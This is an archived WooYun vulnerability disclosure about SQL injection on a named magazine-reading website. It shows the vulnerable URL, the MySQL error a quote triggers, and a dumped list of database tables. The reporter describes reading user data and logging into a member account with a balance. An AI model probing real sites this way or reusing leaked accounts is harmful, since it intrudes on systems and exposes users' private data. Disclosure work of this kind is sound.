乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-12-13: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-01-27: 厂商已经主动忽略漏洞,细节向公众公开
读览天下存在sql注射漏洞,大量用户信息泄漏,可以利用信息进入会员界面,进行人名币购买杂志,个人感觉这个网站已经没什么隐私了,嘻嘻
无意间进入网站
http://www.dooland.com/iptv/article.php?id=174129
然后利用引号发现报错
Error in selecting database error:1064 error message You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''174129''' at line 1 sql: select * from wap.articles where id='174129''
明显的mysql报错,然后利用工具进行注入
[236 tables]+-------------------------+| CD_hxfserial || CD_serialnum || active_ip || admin || bookshelf || cash_coupon || cash_coupon_order || click_stat || click_stat_article || client_cookies || client_message || commend_feedback || commend_ip || commend_url || comment || comment_1 || comment_2 || comment_3 || comment_4 || cooperation_contact || cooperation_memolist || cooperation_notice || cooperation_otherinfo || createcard_list || createcard_user || creatmag_user || creatmaglocal_user || daodu || dl_cookie || dl_cookie_120523 || dl_cookie_120831 || dl_cookie_130409 || dl_cookie_130828 || download_stat || enterprise_info || f_desire_info || feature_mod || feature_mod_article || feature_mod_dutu || feature_mod_newsort || feature_mod_temp || feature_pageimg || feedback || forum_detail_new || forum_manager || forum_topic_new || friendlink || goods_combin || index_area || index_area_crc || index_area_vnet || invoice || ipad_paixu || jxvnet_autopay || jxvnet_paymonth || lakala_topup_order || libuser || libuser_dooland || libuser_login || m_block || m_board || m_index_fldd || m_index_fldd_crc || m_index_hzpp || m_index_jptj || m_index_jptj_crc || m_index_rxdd_crc || m_process_mag || m_process_memo || m_role || mag_bicpic || mag_brand_font || mag_brand_font_crc || mag_convert_img || mag_convert_img_crc || mag_img_tag || mag_linkData || mag_list || mag_list_Waitting || mag_pack || mag_pic_onepage || mag_recommend || mag_sort || mag_sort_convert || mag_sort_detail || mag_sort_detail_editlog || mag_trylook || mag_trylook_text || mailsub || mobile_card_order || mobile_umpay_order || one_shop_car || order_article || order_buyjifen || order_buyvipcard || order_bycar || order_dealresult || order_detail || order_list || order_list_1 || order_merge || order_pack || order_paydetail || order_vipcard || pdf_list || pdf_xps_list || pic_list || pic_list_2011 || pic_list_2012 || poll || price_androidsingle || price_ipad || publish_channels |
找到用户表,然后查看用户数据
然后根据那个用户是会员进行登录下,发现了好东西,余额。。
其他表中也有很多重要的内容,但是没有心思去射了,希望厂商多给些rank就行。
厂商开发人员自己琢磨修复漏洞吧,php防止注射网上技术有很多。
未能联系到厂商或者厂商积极拒绝